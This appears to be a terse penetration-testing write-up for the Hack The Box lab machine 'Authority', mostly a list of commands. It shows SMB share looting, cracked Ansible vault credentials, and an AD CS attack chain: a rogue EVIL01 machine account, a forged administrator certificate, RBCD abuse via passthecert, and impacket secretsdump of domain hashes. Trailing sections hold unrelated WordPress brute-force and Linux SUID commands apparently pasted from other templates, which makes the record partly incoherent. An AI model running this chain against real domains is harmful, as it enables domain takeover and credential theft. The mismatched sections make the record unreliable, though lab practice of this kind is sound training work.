HTB_AD_Authority: Pentration Testing Report
| Name | item |
|---|---|
| Platform | OSCP Play Ground |
| Date | 2025-09-15 10:18:54 |
| Auth | Blackwin |
| Tools used | nmap; gobuster; brupsuite; wpscan |
| Key words | id_rsa; polkit; LXD |
| Ip address | 10.10.11.222 |
| Flag | proof.txt: 9e89507dcfd2001796d15b5eae75a18clocal.txt: 53825454332a4b5d2c4b14a7315ec6d4 |
1. Initial Reconasission
Port scanning
- rustscan -a 10.10.11.222 --scripts none --ulimit 5000 | tee scans/rustscan
- sudo nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,8443,9389,47001,49665,49673,49664,49666,49667,49691,49693,49690,49697,49694,49712,61375,61421 10.10.11.222 -oN scans/nmap
- sudo nmap -sCV -p- --open 10.10.11.222 -oN scans/nmap-all
2. Enumeration
FTP Enum
ftp,lftp
SMB Enum
enum4linux
piliang xiazai
smbclient //10.10.11.222/Development -N -c 'prompt OFF;recurse ON;lcd '~/Desktop/20250915_HTB_AD_Authority';mget *'
$ansible$0*0*15c849c20c74562a25c925c3e5a4abafd392c77635abc2ddc827ba0a1037e9d5*1dff07007e7a25e438e94de3f3e605e1*66cb125164f19fb8ed22809393b1767055a66deae678f4a8b1f8550905f70da5:!@#$%^&*
$ansible$0*0*2fe48d56e7e16f71c18abd22085f39f4fb11a2b9a456cf4b72ec825fc5b9809d*e041732f9243ba0484f582d9cb20e148*4d1741fd34446a95e647c3fb4a4f9e4400eae9dd25d734abba49403c42bc2cd8:!@#$%^&*
$ansible$0*0*c08105402f5db77195a13c1087af3e6fb2bdae60473056b5a477731f51502f93*dfd9eec07341bac0e13c62fe1d0a5f7d*d04b50b49aa665c4db73ad5d8804b4b2511c3b15814ebcf2fe98334284203635:!@#$%^&*0Y`T;CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb�lDaP_1n_th3_cle4r svc_ldap:lDaP_1n_th3_cle4r
certipy find -u svc_ldap@authority.htb -p 'lDaP_1n_th3_cle4r!' -dc-ip 10.10.11.222 -vulnerable
addcomputer.py 'authority.htb/svc_ldap' -method LDAPS -computer-name 'EVIL01' -computer-pass 'Str0ng3st_P@ssw0rd!' -dc-ip 10.10.11.222
:lDaP_1n_th3_cle4r!
certipy req -username EVIL01$ -password 'Str0ng3st_P@ssw0rd!' -ca AUTHORITY-CA -dc-ip 10.10.11.222 -template CorpVPN -upn administrator@authority.htb -dns authority.htb -debug
python3 ./passthecert.py -dc-ip 10.10.11.222 -crt administrator.crt -key administrator.key -domain authority.htb -port 636 -action write_rbcd -delegate-to 'AUTHORITY$' -delegate-from 'EVIL01$'
impacket-getST -spn 'cifs/AUTHORITY.authority.htb' -impersonate Administrator 'authority.htb/EVIL01$:Str0ng3st_P@ssw0rd!'
impacket-secretsdump -k -no-pass authority.htb/Administrator@authority.authority.htb -just-dc-ntlm
Web Enum
directory brute
- ffuf -u http://10.10.11.222/FUZZ -w /usr/share/wordlists/dirb/big.txt
- gobuster dir -u http://10.10.11.222/ -w /usr/share/wordlists/dirb/big.txt
brute force login
- hydra -l loly -P rockyou.txt 10.10.11.222 http-post-form /wordpress/wp-login.php:F=Error -V -t 5 -w 1 -o results.txt
- wpscan --url http://10.10.11.222/wordpress -U loly -P rockyou.txt
3. Initial Shell
4. Post-Enumeration
get flag: find / -name local.txt 2>/dev/null
get basic info:
- OS version:
- sudo version:
- psexec version:
- users: cat /etc/passwd
- flag: find / -name local.txt 2>/dev/null
- SUDI binaries:
- find / -user root -perm -4000 -exec ls -ldb {} ; 2>/dev/null
- find / -uid 0 -perm -6000 -type f 2>/dev/null